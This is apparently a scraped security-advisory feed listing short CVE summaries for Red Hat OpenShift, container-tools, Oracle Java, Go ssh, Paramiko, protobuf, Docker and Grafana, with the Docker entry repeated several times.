Red Hat OpenShift Virtualization release 4.10.1 is now available with updates to packages and images that fix several bugs and add enhancements. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-36221: golang: net/http/httputil: panic due to racy read of persistConn after handler panic * CVE-2021-41190: opencontainers: OCI manifest and index parsing confusion * CVE-2022-21698: prometheus/client_golang: Denial of service using InstrumentHandlerCounter

RHSA-2022:1762: Red Hat Security Advisory: container-tools:rhel8 security, bug fix, and enhancement update

An update for the container-tools:rhel8 module is now available for Red Hat Enterprise Linux 8. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-1227: psgo: Privilege escalation in 'podman top' * CVE-2022-21698: prometheus/client_golang: Denial of service using InstrumentHandlerCounter * CVE-2022-27649: podman: Default inheritable capabilities for linux container should be empty * CVE-2022-27650: crun: Default inheritable capabilities for linux container should be empty...

CVE-2022-21496: Oracle Critical Patch Update Advisory - April 2022

Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JNDI). Supported versions that are affected are Oracle Java SE: 7u331, 8u321, 11.0.14, 17.0.2, 18; Oracle GraalVM Enterprise Edition: 20.3.5, 21.3.1 and 22.0.0.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service ...

CVE-2022-27191: An update of golang.org/x/crypto/ssh might be necessary

The golang.org/x/crypto/ssh package before 0.0.0-20220314234659-1baeb1ce4c0b for Go allows an attacker to crash a server in certain circumstances involving AddHostKey.

CVE-2022-24302: Changelog — Paramiko documentation

In Paramiko before 2.10.1, a race condition (between creation and chmod) in the write_private_key_file function could allow unauthorized information disclosure.

CVE-2021-22570: Release Protocol Buffers v3.15.0 · protocolbuffers/protobuf

Nullptr dereference when a null char is present in a proto symbol. The symbol is parsed incorrectly, leading to an unchecked call into the proto file's name during generation of the resulting error message. Since the symbol is incorrectly parsed, the file is nullptr. We recommend upgrading to version 3.15.0 or greater.

CVE-2021-21285: Docker Engine release notes

In Docker before versions 9.03.15, 20.10.3 there is a vulnerability in which pulling an intentionally malformed Docker image manifest crashes the dockerd daemon. Versions 20.10.3 and 19.03.15 contain patches that prevent the daemon from crashing.

CVE-2021-21285: Docker Engine release notes

In Docker before versions 9.03.15, 20.10.3 there is a vulnerability in which pulling an intentionally malformed Docker image manifest crashes the dockerd daemon. Versions 20.10.3 and 19.03.15 contain patches that prevent the daemon from crashing.

CVE-2021-21285: Docker Engine release notes

In Docker before versions 9.03.15, 20.10.3 there is a vulnerability in which pulling an intentionally malformed Docker image manifest crashes the dockerd daemon. Versions 20.10.3 and 19.03.15 contain patches that prevent the daemon from crashing.

CVE-2021-21285: Docker Engine release notes

In Docker before versions 9.03.15, 20.10.3 there is a vulnerability in which pulling an intentionally malformed Docker image manifest crashes the dockerd daemon. Versions 20.10.3 and 19.03.15 contain patches that prevent the daemon from crashing.

CVE-2021-21285: Docker Engine release notes

In Docker before versions 9.03.15, 20.10.3 there is a vulnerability in which pulling an intentionally malformed Docker image manifest crashes the dockerd daemon. Versions 20.10.3 and 19.03.15 contain patches that prevent the daemon from crashing.

CVE-2020-11110: grafana/CHANGELOG.md at main · grafana/grafana

Grafana through 6.7.1 allows stored XSS due to insufficient input protection in the originalUrl field, which allows an attacker to inject JavaScript code that will be executed after clicking on Open Original Dashboard after visiting the snapshot.

Packet Storm: Latest News

CUPS IPP Attributes LAN Remote Code Execution